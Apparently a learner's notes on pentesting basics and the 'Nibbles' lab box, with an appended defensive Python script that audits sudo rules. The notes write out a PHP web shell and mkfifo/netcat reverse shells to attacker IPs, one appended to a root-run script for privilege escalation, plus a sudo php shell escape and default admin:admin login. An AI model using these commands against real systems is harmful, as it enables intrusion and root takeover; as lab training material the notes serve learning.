Pentesting basics
- Common terms
- shell, port, web server
- Basic tools
- ssh, netcat, tmux, vim
- Service scanning
- nmap, nmap scripts, banner grabbing, ftp, smb+shares, snmp (community string - get network info and creds)
- Web enumeration
- gobuster (with SecLists), banner grabbing, whatweb, certificates, robots.txt, source code
- public exploits
- searchsploit, metasploit
- types of shells
- reverse shell
- bind shell
- Web Shell
- upgrade a shell with
python -c 'import pty; pty.spawn("/bin/bash")'
- privilege escalation
- enumeration scripts (Linux enumeration scripts include LinEnum and linuxprivchecker, and for Windows include Seatbelt and JAWS), or Privilege Escalation Awesome Scripts SUITE (PEASS) for both
- Kernel Exploits
- Vulnerable Software
- User Privileges
- Scheduled Tasks
- Exposed Credentials
- SSH Keys
a sudo -l entry like (user2 : user2) NOPASSWD: /bin/bash for user1 means sudo -u user2 /bin/bash works
- transferring files
- wget, SCP, Base64
Attacking Your First Box
- nibbles, enumeration
nmap -sV --open <IP>
- nibbles, web footprinting
- whatweb, gobuster dir -u http://10.129.42.190/ --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt
- nibbles, initial footprinting
- upload <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?> and use nc -lvnp 9443 to catch the shell, then python3 -c 'import pty; pty.spawn("/bin/bash")' to upgrade it
- nibbles, privilege escalation
monitor.sh had sudo -l permission as root, so echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.39 8443 >/tmp/f' | tee -a monitor.sh can be used to modify it and connect as root
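Added example, not from these notes: a small Python audit that parses sudo -l output and flags the two sudo findings above, a NOPASSWD shell or interpreter and a sudo-runnable script that group/others can edit (the monitor.sh case). The sample output and the /opt/scripts/monitor.sh path are constructed.

```python
import os
import re
import stat

# Constructed sample of `sudo -l` output modelled on the notes above: a NOPASSWD
# shell for user2, and a made-up script path standing in for monitor.sh.
SAMPLE_SUDO_L = """\
    (user2 : user2) NOPASSWD: /bin/bash
    (root) NOPASSWD: /opt/scripts/monitor.sh
    (root) /usr/bin/systemctl status nginx, /usr/bin/php
"""
# Programs that hand the caller a shell or arbitrary code execution outright.
SHELL_LIKE = {"/bin/bash", "/bin/sh", "/usr/bin/php", "/usr/bin/python3"}

def others_can_write(path):
    """True when the file exists and group or world has write permission."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def parse_sudo_l(text):
    """Yield (runas, nopasswd, command) for each command in `sudo -l` output."""
    for line in text.splitlines():
        m = re.match(r"^\s*\(([^)]*)\)\s*(.*)$", line)
        if not m:
            continue
        runas, rest = m.groups()
        nopasswd = False
        for chunk in rest.split(","):
            chunk = chunk.strip()
            # Tags such as NOPASSWD: precede a command and apply to later ones too.
            while (t := re.match(r"([A-Z]+):\s*(.*)$", chunk)):
                nopasswd = t.group(1) == "NOPASSWD" or (nopasswd and t.group(1) != "PASSWD")
                chunk = t.group(2)
            if chunk:
                yield runas, nopasswd, chunk.split()[0]

def audit_sudo_rules(text, writable=others_can_write):
    """Return (command, reason) findings for rules a defender should fix."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        suffix = " without a password" if nopasswd else ""
        if cmd == "ALL" or cmd in SHELL_LIKE:
            findings.append((cmd, f"shell or interpreter runnable as {runas}{suffix}"))
        elif writable(cmd):
            findings.append((cmd, f"sudo target writable by group/others, runs as {runas}{suffix}"))
    return findings
```

Run audit_sudo_rules on real sudo -l output from a host; the writable parameter exists so the file check can be swapped for an offline one.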
- nibbles, metasploit
- use msf module multi/http/nibbleblog_file_upload
Knowledge check
- GetSimple CMS
- user flag is enter admin page with admin:admin, edit php theme
- root flag is suid php binary, use sudo /usr/bin/php -r 'system("/bin/bash");'